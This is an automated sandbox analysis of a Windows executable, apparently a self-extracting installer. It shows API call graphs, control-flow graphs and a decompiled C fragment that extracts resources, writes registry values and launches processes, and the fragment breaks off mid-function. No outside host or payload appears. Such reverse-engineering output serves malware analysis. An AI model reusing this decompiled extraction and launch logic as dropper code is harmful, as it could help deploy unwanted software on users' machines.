2699->2840 2703 10e5678 2700->2703 2701->2704 2708 10e586c GetWindowsDirectoryA 2701->2708 2709 10e5717 GetDriveTypeA 2701->2709 2703->2704 2705 10e5680 2703->2705 2704->2696 2707 10e44b9 20 API calls 2705->2707 2707->2710 2874 10e597d GetCurrentDirectoryA SetCurrentDirectoryA 2708->2874 2711 10e5730 GetFileAttributesA 2709->2711 2724 10e572b 2709->2724 2710->2704 2711->2724 2715 10e597d 34 API calls 2715->2724 2716 10e5467 49 API calls 2716->2701 2717 10e2630 21 API calls 2717->2724 2719 10e57c1 GetWindowsDirectoryA 2719->2724 2720 10e658a CharPrevA 2721 10e57e8 GetFileAttributesA 2720->2721 2722 10e57fa CreateDirectoryA 2721->2722 2721->2724 2722->2724 2723 10e5827 SetFileAttributesA 2723->2724 2724->2704 2724->2708 2724->2709 2724->2711 2724->2715 2724->2717 2724->2719 2724->2720 2724->2723 2725 10e5467 49 API calls 2724->2725 2870 10e6952 2724->2870 2725->2724 2727 10e6268 2726->2727 2728 10e6249 2726->2728 2729 10e597d 34 API calls 2727->2729 2730 10e44b9 20 API calls 2728->2730 2732 10e6277 2729->2732 2731 10e625a 2730->2731 2733 10e6285 GetLastError 2731->2733 2734 10e6ce0 4 API calls 2732->2734 2735 10e625f 2733->2735 2736 10e3013 2734->2736 2735->2732 2736->2455 2736->2472 2738 10e3b2d 2737->2738 2738->2738 2739 10e3b72 2738->2739 2740 10e3b53 2738->2740 2941 10e4fe0 2739->2941 2742 10e6517 24 API calls 2740->2742 2743 10e3b70 2742->2743 2744 10e3b7b 2743->2744 2745 10e6298 10 API calls 2743->2745 2744->2459 2745->2744 2747 10e2622 2746->2747 2748 10e2583 2746->2748 2971 10e24e0 GetWindowsDirectoryA 2747->2971 2750 10e258b 2748->2750 2751 10e25e8 RegOpenKeyExA 2748->2751 2753 10e25e3 2750->2753 2755 10e259b RegOpenKeyExA 2750->2755 2752 10e2609 RegQueryInfoKeyA 2751->2752 2751->2753 2754 10e25d1 RegCloseKey 2752->2754 2753->2465 2754->2753 2755->2753 2756 10e25bc RegQueryValueExA 2755->2756 2756->2754 2758 10e3bdb 2757->2758 2766 10e3bec 2757->2766 2759 10e468f 7 API calls 2758->2759 2759->2766 2760 10e3c03 memset 2760->2766 2761 10e3d13 2762 10e44b9 20 API calls 2761->2762 2790 10e3d26 2762->2790 2763 10e468f 7 API calls 2763->2766 2765 10e6ce0 4 API calls 2767 10e3f60 2765->2767 2766->2760 2766->2761 2766->2763 2768 10e3fd7 2766->2768 2769 10e3d7b CompareStringA 2766->2769 2770 10e3f4d 2766->2770 2772 10e3fab 2766->2772 2775 10e3f1e LocalFree 2766->2775 2776 10e3f46 LocalFree 2766->2776 2780 10e3cc7 CompareStringA 2766->2780 2791 10e3e10 2766->2791 2979 10e1ae8 2766->2979 3019 10e202a memset memset RegCreateKeyExA 2766->3019 3045 10e3fef 2766->3045 2767->2469 2768->2770 3069 10e2267 2768->3069 2769->2766 2769->2768 2770->2765 2774 10e44b9 20 API calls 2772->2774 2778 10e3fbe LocalFree 2774->2778 2775->2766 2775->2768 2776->2770 2778->2770 2780->2766 2781 10e3e1f GetProcAddress 2784 10e3f64 2781->2784 2781->2791 2782 10e3f92 2783 10e44b9 20 API calls 2782->2783 2785 10e3fa9 2783->2785 2786 10e44b9 20 API calls 2784->2786 2787 10e3f7c LocalFree 2785->2787 2788 10e3f75 FreeLibrary 2786->2788 2789 10e6285 GetLastError 2787->2789 2788->2787 2789->2790 2790->2770 2791->2781 2791->2782 2792 10e3eff FreeLibrary 2791->2792 2793 10e3f40 FreeLibrary 2791->2793 3059 10e6495 2791->3059 2792->2775 2793->2776 2795 10e468f 7 API calls 2794->2795 2796 10e3a55 LocalAlloc 2795->2796 2797 10e3a8e 2796->2797 2798 10e3a6c 2796->2798 2800 10e468f 7 API calls 2797->2800 2799 10e44b9 20 API calls 2798->2799 2801 10e3a7d 2799->2801 2802 10e3a98 2800->2802 2803 10e6285 GetLastError 2801->2803 2804 10e3a9c 2802->2804 2805 10e3ac5 lstrcmpA 2802->2805 2811 10e2f64 2803->2811 2806 10e44b9 20 API calls 2804->2806 2807 10e3b0d LocalFree 2805->2807 2808 10e3ada 2805->2808 2809 10e3aad LocalFree 2806->2809 2807->2811 2810 10e6517 24 API calls 2808->2810 2809->2811 2812 10e3aec LocalFree 2810->2812 2811->2437 2811->2472 2812->2811 2814 10e303c 2813->2814 2814->2472 2816 10e468f 7 API calls 2815->2816 2817 10e417d LocalAlloc 2816->2817 2818 10e41a8 2817->2818 2819 10e4195 2817->2819 2821 10e468f 7 API calls 2818->2821 2820 10e44b9 20 API calls 2819->2820 2822 10e41a6 2820->2822 2823 10e41b5 2821->2823 2822->2472 2824 10e41b9 2823->2824 2825 10e41c5 lstrcmpA 2823->2825 2827 10e44b9 20 API calls 2824->2827 2825->2824 2826 10e41e6 LocalFree 2825->2826 2826->2822 2827->2826 2829 10e171e _vsnprintf 2828->2829 2839 10e62c9 FindResourceA 2829->2839 2831 10e62cb LoadResource LockResource 2832 10e6353 2831->2832 2835 10e62e0 2831->2835 2833 10e6ce0 4 API calls 2832->2833 2834 10e51ca 2833->2834 2834->2673 2834->2674 2836 10e631b FreeResource 2835->2836 2837 10e6355 FreeResource 2835->2837 2838 10e171e _vsnprintf 2836->2838 2837->2832 2838->2839 2839->2831 2839->2832 2841 10e548a 2840->2841 2843 10e551a 2840->2843 2901 10e53a1 2841->2901 2912 10e58c8 2843->2912 2844 10e5581 2848 10e6ce0 4 API calls 2844->2848 2847 10e5495 2847->2844 2853 10e550c 2847->2853 2854 10e54c2 GetSystemInfo 2847->2854 2855 10e559a 2848->2855 2849 10e554d 2849->2844 2856 10e597d 34 API calls 2849->2856 2850 10e553b CreateDirectoryA 2851 10e5577 2850->2851 2852 10e5547 2850->2852 2857 10e6285 GetLastError 2851->2857 2852->2849 2858 10e658a CharPrevA 2853->2858 2861 10e54da 2854->2861 2855->2704 2864 10e2630 GetWindowsDirectoryA 2855->2864 2859 10e555c 2856->2859 2860 10e557c 2857->2860 2858->2843 2859->2844 2863 10e5568 RemoveDirectoryA 2859->2863 2860->2844 2861->2853 2862 10e658a CharPrevA 2861->2862 2862->2853 2863->2844 2865 10e265e 2864->2865 2866 10e266f 2864->2866 2868 10e44b9 20 API calls 2865->2868 2867 10e6ce0 4 API calls 2866->2867 2869 10e2687 2867->2869 2868->2866 2869->2701 2869->2716 2871 10e696e GetDiskFreeSpaceA 2870->2871 2872 10e69a1 2870->2872 2871->2872 2873 10e6989 MulDiv 2871->2873 2872->2724 2873->2872 2875 10e59dd GetDiskFreeSpaceA 2874->2875 2876 10e59bb 2874->2876 2878 10e5ba1 memset 2875->2878 2879 10e5a21 MulDiv 2875->2879 2877 10e44b9 20 API calls 2876->2877 2880 10e59cc 2877->2880 2881 10e6285 GetLastError 2878->2881 2879->2878 2882 10e5a50 GetVolumeInformationA 2879->2882 2883 10e6285 GetLastError 2880->2883 2884 10e5bbc GetLastError FormatMessageA 2881->2884 2885 10e5a6e memset 2882->2885 2886 10e5ab5 SetCurrentDirectoryA 2882->2886 2887 10e59d1 2883->2887 2888 10e5be3 2884->2888 2889 10e6285 GetLastError 2885->2889 2895 10e5acc 2886->2895 2899 10e5b94 2887->2899 2890 10e44b9 20 API calls 2888->2890 2891 10e5a89 GetLastError FormatMessageA 2889->2891 2893 10e5bf5 SetCurrentDirectoryA 2890->2893 2891->2888 2892 10e6ce0 4 API calls 2894 10e5c11 2892->2894 2893->2899 2894->2701 2896 10e5b0a 2895->2896 2898 10e5b20 2895->2898 2897 10e44b9 20 API calls 2896->2897 2897->2887 2898->2899 2924 10e268b 2898->2924 2899->2892 2903 10e53bf 2901->2903 2902 10e171e _vsnprintf 2902->2903 2903->2902 2904 10e658a CharPrevA 2903->2904 2908 10e5415 GetTempFileNameA 2903->2908 2905 10e53fa RemoveDirectoryA GetFileAttributesA 2904->2905 2905->2903 2906 10e544f CreateDirectoryA 2905->2906 2907 10e543a 2906->2907 2906->2908 2910 10e6ce0 4 API calls 2907->2910 2908->2907 2909 10e5429 DeleteFileA CreateDirectoryA 2908->2909 2909->2907 2911 10e5449 2910->2911 2911->2847 2913 10e58d8 2912->2913 2913->2913 2914 10e58df LocalAlloc 2913->2914 2915 10e5919 2914->2915 2916 10e58f3 2914->2916 2919 10e658a CharPrevA 2915->2919 2917 10e44b9 20 API calls 2916->2917 2922 10e5906 2917->2922 2918 10e6285 GetLastError 2923 10e5534 2918->2923 2920 10e5931 CreateFileA LocalFree 2919->2920 2921 10e595b CloseHandle GetFileAttributesA 2920->2921 2920->2922 2921->2922 2922->2918 2922->2923 2923->2849 2923->2850 2925 10e26b9 2924->2925 2926 10e26e5 2924->2926 2927 10e171e _vsnprintf 2925->2927 2928 10e271f 2926->2928 2929 10e26ea 2926->2929 2931 10e26cc 2927->2931 2933 10e171e _vsnprintf 2928->2933 2939 10e26e3 2928->2939 2930 10e171e _vsnprintf 2929->2930 2932 10e26fd 2930->2932 2935 10e44b9 20 API calls 2931->2935 2936 10e44b9 20 API calls 2932->2936 2937 10e2735 2933->2937 2934 10e6ce0 4 API calls 2938 10e276d 2934->2938 2935->2939 2936->2939 2940 10e44b9 20 API calls 2937->2940 2938->2899 2939->2934 2940->2939 2942 10e468f 7 API calls 2941->2942 2943 10e4ff5 FindResourceA LoadResource LockResource 2942->2943 2944 10e5020 2943->2944 2945 10e515f 2943->2945 2946 10e5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2944->2946 2947 10e5057 2944->2947 2945->2743 2946->2947 2963 10e4efd 2947->2963 2950 10e5060 2951 10e44b9 20 API calls 2950->2951 2957 10e5075 2951->2957 2952 10e5106 2955 10e511d 2952->2955 2956 10e5110 FreeResource 2952->2956 2953 10e50e8 2954 10e44b9 20 API calls 2953->2954 2954->2957 2958 10e513a 2955->2958 2960 10e5129 2955->2960 2956->2955 2957->2952 2958->2945 2962 10e514c SendMessageA 2958->2962 2959 10e507c 2959->2952 2959->2953 2961 10e44b9 20 API calls 2960->2961 2961->2958 2962->2945 2964 10e4f4a 2963->2964 2965 10e4980 25 API calls 2964->2965 2970 10e4fa1 2964->2970 2968 10e4f67 2965->2968 2966 10e6ce0 4 API calls 2967 10e4fc6 2966->2967 2967->2950 2967->2959 2969 10e4b60 FindCloseChangeNotification 2968->2969 2968->2970 2969->2970 2970->2966 2972 10e255b 2971->2972 2973 10e2510 2971->2973 2975 10e6ce0 4 API calls 2972->2975 2974 10e658a CharPrevA 2973->2974 2976 10e2522 WritePrivateProfileStringA _lopen 2974->2976 2977 10e2569 2975->2977 2976->2972 2978 10e2548 _llseek _lclose 2976->2978 2977->2753 2978->2972 2980 10e1b25 2979->2980 3083 10e1a84 2980->3083 2982 10e1b57 2983 10e658a CharPrevA 2982->2983 2985 10e1b8c 2982->2985 2983->2985 2984 10e66c8 2 API calls 2986 10e1bd1 2984->2986 2985->2984 2987 10e1bd9 CompareStringA 2986->2987 2988 10e1d73 2986->2988 2987->2988 2989 10e1bf7 GetFileAttributesA 2987->2989 2990 10e66c8 2 API calls 2988->2990 2991 10e1c0d 2989->2991 2992 10e1d53 2989->2992 2993 10e1d7d 2990->2993 2991->2992 2998 10e1a84 2 API calls 2991->2998 2996 10e44b9 20 API calls 2992->2996 2994 10e1df8 LocalAlloc 2993->2994 2995 10e1d81 CompareStringA 2993->2995 2994->2992 2997 10e1e0b GetFileAttributesA 2994->2997 2995->2994 3004 10e1d9b 2995->3004 3017 10e1cc2 2996->3017 2999 10e1e1d 2997->2999 3000 10e1e45 2997->3000 3001 10e1c31 2998->3001 2999->3000 3089 10e2aac 3000->3089 3002 10e1c50 LocalAlloc 3001->3002 3007 10e1a84 2 API calls 3001->3007 3002->2992 3010 10e1c67 GetPrivateProfileIntA GetPrivateProfileStringA 3002->3010 3003 10e6ce0 4 API calls 3006 10e1ea1 3003->3006 3004->3004 3008 10e1dbe LocalAlloc 3004->3008 3006->2766 3007->3002 3008->2992 3013 10e1de1 3008->3013 3012 10e1cf8 3010->3012 3010->3017 3011 10e1e89 3011->3003 3014 10e1d09 GetShortPathNameA 3012->3014 3015 10e1d23 3012->3015 3016 10e171e _vsnprintf 3013->3016 3014->3015 3018 10e171e _vsnprintf 3015->3018 3016->3017 3017->3011 3018->3017 3020 10e209a 3019->3020 3021 10e2256 3019->3021 3023 10e171e _vsnprintf 3020->3023 3026 10e20dc 3020->3026 3022 10e6ce0 4 API calls 3021->3022 3024 10e2263 3022->3024 3025 10e20af RegQueryValueExA 3023->3025 3024->2766 3025->3020 3025->3026 3027 10e20fb GetSystemDirectoryA 3026->3027 3028 10e20e4 RegCloseKey 3026->3028 3029 10e658a CharPrevA 3027->3029 3028->3021 3030 10e211b LoadLibraryA 3029->3030 3031 10e212e GetProcAddress FreeLibrary 3030->3031 3032 10e2179 GetModuleFileNameA 3030->3032 3031->3032 3034 10e214e GetSystemDirectoryA 3031->3034 3033 10e21de RegCloseKey 3032->3033 3037 10e2177 3032->3037 3033->3021 3035 10e2165 3034->3035 3034->3037 3036 10e658a CharPrevA 3035->3036 3036->3037 3037->3037 3038 10e21b7 LocalAlloc 3037->3038 3039 10e21ec 3038->3039 3040 10e21cd 3038->3040 3042 10e171e _vsnprintf 3039->3042 3041 10e44b9 20 API calls 3040->3041 3041->3033 3043 10e2218 RegSetValueExA RegCloseKey LocalFree 3042->3043 3043->3021 3046 10e4016 CreateProcessA 3045->3046 3057 10e4106 3045->3057 3047 10e40c4 3046->3047 3048 10e4041 WaitForSingleObject GetExitCodeProcess 3046->3048 3051 10e6285 GetLastError 3047->3051 3053 10e4070 3048->3053 3049 10e6ce0 4 API calls 3050 10e4117 3049->3050 3050->2766 3052 10e40c9 GetLastError FormatMessageA 3051->3052 3055 10e44b9 20 API calls 3052->3055 3116 10e411b 3053->3116 3055->3057 3056 10e4096 CloseHandle CloseHandle 3056->3057 3058 10e40ba 3056->3058 3057->3049 3058->3057 3060 10e64c2 3059->3060 3061 10e658a CharPrevA 3060->3061 3062 10e64d8 GetFileAttributesA 3061->3062 3063 10e64ea 3062->3063 3064 10e6501 LoadLibraryA 3062->3064 3063->3064 3065 10e64ee LoadLibraryExA 3063->3065 3066 10e6508 3064->3066 3065->3066 3067 10e6ce0 4 API calls 3066->3067 3068 10e6513 3067->3068 3068->2791 3070 10e2289 RegOpenKeyExA 3069->3070 3071 10e2381 3069->3071 3070->3071 3072 10e22b1 RegQueryValueExA 3070->3072 3073 10e6ce0 4 API calls 3071->3073 3074 10e22e6 memset GetSystemDirectoryA 3072->3074 3075 10e2374 RegCloseKey 3072->3075 3076 10e238c 3073->3076 3077 10e230f 3074->3077 3078 10e2321 3074->3078 3075->3071 3076->2770 3079 10e658a CharPrevA 3077->3079 3080 10e171e _vsnprintf 3078->3080 3079->3078 3081 10e233f RegSetValueExA 3080->3081 3081->3075 3084 10e1a9a 3083->3084 3086 10e1aba 3084->3086 3088 10e1aaf 3084->3088 3102 10e667f 3084->3102 3086->2982 3087 10e667f 2 API calls 3087->3088 3088->3086 3088->3087 3090 10e2be6 3089->3090 3091 10e2ad4 GetModuleFileNameA 3089->3091 3092 10e6ce0 4 API calls 3090->3092 3101 10e2b02 3091->3101 3094 10e2bf5 3092->3094 3093 10e2af1 IsDBCSLeadByte 3093->3101 3094->3011 3095 10e2bca CharNextA 3097 10e2bd3 CharNextA 3095->3097 3096 10e2b11 CharNextA CharUpperA 3098 10e2b8d CharUpperA 3096->3098 3096->3101 3097->3101 3098->3101 3100 10e2b43 CharPrevA 3100->3101 3101->3090 3101->3093 3101->3095 3101->3096 3101->3097 3101->3100 3107 10e65e8 3101->3107 3103 10e6689 3102->3103 3104 10e66a5 3103->3104 3105 10e6648 IsDBCSLeadByte 3103->3105 3106 10e6697 CharNextA 3103->3106 3104->3084 3105->3103 3106->3103 3108 10e65f4 3107->3108 3108->3108 3109 10e65fb CharPrevA 3108->3109 3110 10e6611 CharPrevA 3109->3110 3111 10e660b 3110->3111 3113 10e661e 3110->3113 3111->3110 3111->3113 3112 10e663d 3112->3101 3113->3112 3114 10e6627 CharPrevA 3113->3114 3115 10e6634 CharNextA 3113->3115 3114->3112 3114->3115 3115->3112 3117 10e4132 3116->3117 3119 10e412a 3116->3119 3120 10e1ea7 3117->3120 3119->3056 3121 10e1eba 3120->3121 3122 10e1ed3 3120->3122 3123 10e256d 15 API calls 3121->3123 3122->3119 3123->3122 3125 10e2026 3124->3125 3126 10e1ff0 RegOpenKeyExA 3124->3126 3125->2479 3126->3125 3127 10e200f RegDeleteValueA RegCloseKey 3126->3127 3127->3125 3237 10e6a20 __getmainargs 3238 10e19e0 3239 10e1a24 GetDesktopWindow 3238->3239 3240 10e1a03 3238->3240 3242 10e43d0 11 API calls 3239->3242 3241 10e1a20 3240->3241 3243 10e1a16 EndDialog 3240->3243 3245 10e6ce0 4 API calls 3241->3245 3244 10e1a33 LoadStringA SetDlgItemTextA MessageBeep 3242->3244 3243->3241 3244->3241 3246 10e1a7e 3245->3246 3247 10e7270 _except_handler4_common 3248 10e69b0 3249 10e69b5 3248->3249 3257 10e6fbe GetModuleHandleW 3249->3257 3251 10e69c1 __set_app_type __p__fmode __p__commode 3252 10e69f9 3251->3252 3253 10e6a0e 3252->3253 3254 10e6a02 __setusermatherr 3252->3254 3259 10e71ef _controlfp 3253->3259 3254->3253 3256 10e6a13 3258 10e6fcf 3257->3258 3258->3251 3259->3256 3260 10e34f0 3261 10e3504 3260->3261 3262 10e35b8 3260->3262 3261->3262 3263 10e35be GetDesktopWindow 3261->3263 3264 10e351b 3261->3264 3265 10e3526 3262->3265 3269 10e3671 EndDialog 3262->3269 3266 10e43d0 11 API calls 3263->3266 3267 10e354f 3264->3267 3268 10e351f 3264->3268 3270 10e35d6 3266->3270 3267->3265 3272 10e3559 ResetEvent 3267->3272 3268->3265 3271 10e352d TerminateThread EndDialog 3268->3271 3269->3265 3273 10e361d SetWindowTextA CreateThread 3270->3273 3274 10e35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3270->3274 3271->3265 3275 10e44b9 20 API calls 3272->3275 3273->3265 3276 10e3646 3273->3276 3274->3273 3277 10e3581 3275->3277 3278 10e44b9 20 API calls 3276->3278 3279 10e359b SetEvent 3277->3279 3281 10e358a SetEvent 3277->3281 3278->3262 3280 10e3680 4 API calls 3279->3280 3280->3262 3281->3265 3282 10e6ef0 3283 10e6f2d 3282->3283 3285 10e6f02 3282->3285 3284 10e6f27 ?terminate@ 3284->3283 3285->3283 3285->3284

                              Callgraph

                              • Executed
                              • Not Executed
                              • Opacity -> Relevance
                              • Disassembly available
                              callgraph 0 Function_010E490C 1 Function_010E7208 2 Function_010E4702 57 Function_010E1680 2->57 83 Function_010E16B3 2->83 3 Function_010E6C03 26 Function_010E724D 3->26 4 Function_010E7000 5 Function_010E4200 6 Function_010E3100 95 Function_010E43D0 6->95 7 Function_010E171E 8 Function_010E621E 45 Function_010E597D 8->45 55 Function_010E6285 8->55 81 Function_010E44B9 8->81 108 Function_010E6CE0 8->108 9 Function_010E681F 9->108 116 Function_010E66F9 9->116 10 Function_010E2F1D 10->8 18 Function_010E3B26 10->18 22 Function_010E3A3F 10->22 34 Function_010E256D 10->34 36 Function_010E4169 10->36 39 Function_010E5164 10->39 51 Function_010E658A 10->51 10->55 73 Function_010E3BA2 10->73 77 Function_010E55A0 10->77 10->81 105 Function_010E51E5 10->105 10->108 11 Function_010E411B 71 Function_010E1EA7 11->71 12 Function_010E5C17 13 Function_010E6517 13->81 14 Function_010E3210 19 Function_010E4224 14->19 14->45 14->51 14->81 85 Function_010E58C8 14->85 14->95 15 Function_010E7010 16 Function_010E6E2A 117 Function_010E6CF0 16->117 17 Function_010E202A 17->7 17->51 17->81 17->108 18->13 62 Function_010E6298 18->62 106 Function_010E4FE0 18->106 19->57 19->81 20 Function_010E7120 21 Function_010E6A20 22->13 50 Function_010E468F 22->50 22->55 22->81 23 Function_010E6C3F 24 Function_010E4C37 25 Function_010E2630 25->81 25->108 27 Function_010E6648 28 Function_010E6F40 29 Function_010E6F54 29->1 29->26 30 Function_010E7155 31 Function_010E6952 32 Function_010E4A50 33 Function_010E3450 33->95 107 Function_010E24E0 34->107 35 Function_010E476D 35->13 68 Function_010E66AE 35->68 36->50 36->81 37 Function_010E5467 37->45 37->51 37->55 37->57 60 Function_010E1781 37->60 78 Function_010E53A1 37->78 37->85 37->108 38 Function_010E2267 38->7 38->51 38->108 39->50 39->62 39->81 40 Function_010E4B60 41 Function_010E6A60 41->1 41->23 41->26 41->30 42 Function_010E7060 41->42 115 Function_010E2BFB 41->115 42->15 42->20 43 Function_010E6760 44 Function_010E667F 44->27 52 Function_010E268B 45->52 45->55 45->81 45->108 46 Function_010E487A 46->0 47 Function_010E2773 47->51 47->57 47->60 47->108 48 Function_010E7270 49 Function_010E6C70 51->83 52->7 52->81 52->108 53 Function_010E2A89 54 Function_010E1A84 54->44 56 Function_010E4980 56->46 56->81 57->60 58 Function_010E3680 59 Function_010E6380 61 Function_010E5C9E 61->12 61->16 61->44 61->51 61->57 61->81 86 Function_010E66C8 61->86 61->108 109 Function_010E31E0 61->109 62->7 62->108 63 Function_010E4E99 63->57 64 Function_010E6495 64->51 64->60 64->108 65 Function_010E6793 66 Function_010E2390 66->51 66->57 66->66 66->83 66->108 67 Function_010E1F90 67->71 67->81 67->108 69 Function_010E2AAC 69->57 87 Function_010E17C8 69->87 104 Function_010E65E8 69->104 69->108 70 Function_010E2CAA 70->13 70->50 70->61 70->66 75 Function_010E18A3 70->75 70->81 96 Function_010E36EE 70->96 70->108 71->34 72 Function_010E6FA5 72->26 73->17 73->38 73->50 73->55 73->60 73->64 73->81 98 Function_010E3FEF 73->98 102 Function_010E1AE8 73->102 73->108 74 Function_010E72A2 97 Function_010E17EE 75->97 75->108 76 Function_010E4CA0 77->13 77->25 77->31 77->37 77->45 77->50 77->51 77->55 77->60 77->81 77->108 78->7 78->51 78->57 78->108 79 Function_010E6FA1 80 Function_010E6FBE 80->29 81->7 81->9 81->57 88 Function_010E67C9 81->88 81->108 82 Function_010E52B6 82->60 82->66 82->104 82->108 112 Function_010E1FE1 82->112 83->60 84 Function_010E69B0 84->4 84->49 84->80 99 Function_010E71EF 84->99 85->51 85->55 85->57 85->81 86->27 88->65 89 Function_010E4CC0 90 Function_010E4BC0 91 Function_010E30C0 92 Function_010E63C0 92->51 92->60 92->108 93 Function_010E4AD0 93->58 94 Function_010E4CD0 94->2 94->24 94->35 94->40 94->56 94->63 94->108 110 Function_010E47E0 94->110 95->108 96->9 96->53 96->81 96->88 103 Function_010E28E8 96->103 96->108 97->108 98->11 98->55 98->81 98->108 100 Function_010E6BEF 101 Function_010E70EB 102->7 102->51 102->54 102->57 102->60 102->69 102->81 102->83 102->86 102->108 103->47 103->53 105->50 105->55 105->81 106->50 106->81 114 Function_010E4EFD 106->114 107->51 107->108 108->117 110->57 110->81 111 Function_010E19E0 111->95 111->108 113 Function_010E70FE 114->40 114->56 114->108 115->10 115->67 115->70 115->82 118 Function_010E34F0 118->58 118->81 118->95 119 Function_010E6EF0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 36 10e3ba2-10e3bd9 37 10e3bfd-10e3bff 36->37 38 10e3bdb-10e3bee call 10e468f 36->38 40 10e3c03-10e3c28 memset 37->40 44 10e3bf4-10e3bf7 38->44 45 10e3d13-10e3d30 call 10e44b9 38->45 42 10e3c2e-10e3c40 call 10e468f 40->42 43 10e3d35-10e3d48 call 10e1781 40->43 42->45 54 10e3c46-10e3c49 42->54 49 10e3d4d-10e3d52 43->49 44->37 44->45 55 10e3f4d 45->55 52 10e3d9e-10e3db6 call 10e1ae8 49->52 53 10e3d54-10e3d6c call 10e468f 49->53 52->55 66 10e3dbc-10e3dc2 52->66 53->45 68 10e3d6e-10e3d75 53->68 54->45 57 10e3c4f-10e3c56 54->57 60 10e3f4f-10e3f63 call 10e6ce0 55->60 62 10e3c58-10e3c5e 57->62 63 10e3c60-10e3c65 57->63 69 10e3c6e-10e3c73 62->69 64 10e3c67-10e3c6d 63->64 65 10e3c75-10e3c7c 63->65 64->69 72 10e3c87-10e3c89 65->72 73 10e3c7e-10e3c82 65->73 70 10e3de6-10e3de8 66->70 71 10e3dc4-10e3dce 66->71 75 10e3fda-10e3fe1 68->75 76 10e3d7b-10e3d98 CompareStringA 68->76 69->72 79 10e3dee-10e3df5 70->79 80 10e3f0b-10e3f15 call 10e3fef 70->80 71->70 77 10e3dd0-10e3dd7 71->77 72->49 78 10e3c8f-10e3c98 72->78 73->72 81 10e3fe8-10e3fea 75->81 82 10e3fe3 call 10e2267 75->82 76->52 76->75 77->70 84 10e3dd9-10e3ddb 77->84 85 10e3c9a-10e3c9c 78->85 86 10e3cf1-10e3cf3 78->86 87 10e3fab-10e3fd2 call 10e44b9 LocalFree 79->87 88 10e3dfb-10e3dfd 79->88 91 10e3f1a-10e3f1c 80->91 81->60 82->81 84->79 92 10e3ddd-10e3de1 call 10e202a 84->92 94 10e3c9e-10e3ca3 85->94 95 10e3ca5-10e3ca7 85->95 86->52 90 10e3cf9-10e3d11 call 10e468f 86->90 87->55 88->80 96 10e3e03-10e3e0a 88->96 90->45 90->49 98 10e3f1e-10e3f2d LocalFree 91->98 99 10e3f46-10e3f47 LocalFree 91->99 92->70 102 10e3cb2-10e3cc5 call 10e468f 94->102 95->55 103 10e3cad 95->103 96->80 104 10e3e10-10e3e19 call 10e6495 96->104 106 10e3fd7-10e3fd9 98->106 107 10e3f33-10e3f3b 98->107 99->55 102->45 112 10e3cc7-10e3ce8 CompareStringA 102->112 103->102 113 10e3e1f-10e3e36 GetProcAddress 104->113 114 10e3f92-10e3fa9 call 10e44b9 104->114 106->75 107->40 112->86 116 10e3cea-10e3ced 112->116 117 10e3e3c-10e3e80 113->117 118 10e3f64-10e3f76 call 10e44b9 FreeLibrary 113->118 125 10e3f7c-10e3f90 LocalFree call 10e6285 114->125 116->86 119 10e3e8b-10e3e94 117->119 120 10e3e82-10e3e87 117->120 118->125 123 10e3e9f-10e3ea2 119->123 124 10e3e96-10e3e9b 119->124 120->119 128 10e3ead-10e3eb6 123->128 129 10e3ea4-10e3ea9 123->129 124->123 125->55 131 10e3eb8-10e3ebd 128->131 132 10e3ec1-10e3ec3 128->132 129->128 131->132 133 10e3ece-10e3eec 132->133 134 10e3ec5-10e3eca 132->134 137 10e3eee-10e3ef3 133->137 138 10e3ef5-10e3efd 133->138 134->133 137->138 139 10e3eff-10e3f09 FreeLibrary 138->139 140 10e3f40 FreeLibrary 138->140 139->98 140->99
                              C-Code - Quality: 82%
                              			E010E3BA2() {
                              				signed int _v8;
                              				signed int _v12;
                              				char _v276;
                              				char _v280;
                              				short _v300;
                              				intOrPtr _v304;
                              				void _v348;
                              				char _v352;
                              				intOrPtr _v356;
                              				signed int _v360;
                              				short _v364;
                              				char* _v368;
                              				intOrPtr _v372;
                              				void* _v376;
                              				intOrPtr _v380;
                              				char _v384;
                              				signed int _v388;
                              				intOrPtr _v392;
                              				signed int _v396;
                              				signed int _v400;
                              				signed int _v404;
                              				void* _v408;
                              				void* _v424;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t69;
                              				signed int _t76;
                              				void* _t77;
                              				signed int _t79;
                              				short _t96;
                              				signed int _t97;
                              				intOrPtr _t98;
                              				signed int _t101;
                              				signed int _t104;
                              				signed int _t108;
                              				int _t112;
                              				void* _t115;
                              				signed char _t118;
                              				void* _t125;
                              				signed int _t127;
                              				void* _t128;
                              				struct HINSTANCE__* _t129;
                              				void* _t130;
                              				short _t137;
                              				char* _t140;
                              				signed char _t144;
                              				signed char _t145;
                              				signed int _t149;
                              				void* _t150;
                              				void* _t151;
                              				signed int _t153;
                              				void* _t155;
                              				void* _t156;
                              				signed int _t157;
                              				signed int _t162;
                              				signed int _t164;
                              				void* _t165;
                              
                              				_t164 = (_t162 & 0xfffffff8) - 0x194;
                              				_t69 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t69 ^ _t164;
                              				_t153 = 0;
                              				 *0x10e9124 =  *0x10e9124 & 0;
                              				_t149 = 0;
                              				_v388 = 0;
                              				_v384 = 0;
                              				_t165 =  *0x10e8a28 - _t153; // 0x0
                              				if(_t165 != 0) {
                              					L3:
                              					_t127 = 0;
                              					_v392 = 0;
                              					while(1) {
                              						_v400 = _v400 & 0x00000000;
                              						memset( &_v348, 0, 0x44);
                              						_t164 = _t164 + 0xc;
                              						_v348 = 0x44;
                              						if( *0x10e8c42 != 0) {
                              							goto L26;
                              						}
                              						_t146 =  &_v396;
                              						_t115 = E010E468F("SHOWWINDOW",  &_v396, 4);
                              						if(_t115 == 0 || _t115 > 4) {
                              							L25:
                              							_t146 = 0x4b1;
                              							E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                              							 *0x10e9124 = 0x80070714;
                              							goto L62;
                              						} else {
                              							if(_v396 != 1) {
                              								__eflags = _v396 - 2;
                              								if(_v396 != 2) {
                              									_t137 = 3;
                              									__eflags = _v396 - _t137;
                              									if(_v396 == _t137) {
                              										_v304 = 1;
                              										_v300 = _t137;
                              									}
                              									goto L14;
                              								}
                              								_push(6);
                              								_v304 = 1;
                              								_pop(0);
                              								goto L11;
                              							} else {
                              								_v304 = 1;
                              								L11:
                              								_v300 = 0;
                              								L14:
                              								if(_t127 != 0) {
                              									L27:
                              									_t155 = 1;
                              									__eflags = _t127 - 1;
                              									if(_t127 != 1) {
                              										L31:
                              										_t132 =  &_v280;
                              										_t76 = E010E1AE8( &_v280,  &_v408,  &_v404); // executed
                              										__eflags = _t76;
                              										if(_t76 == 0) {
                              											L62:
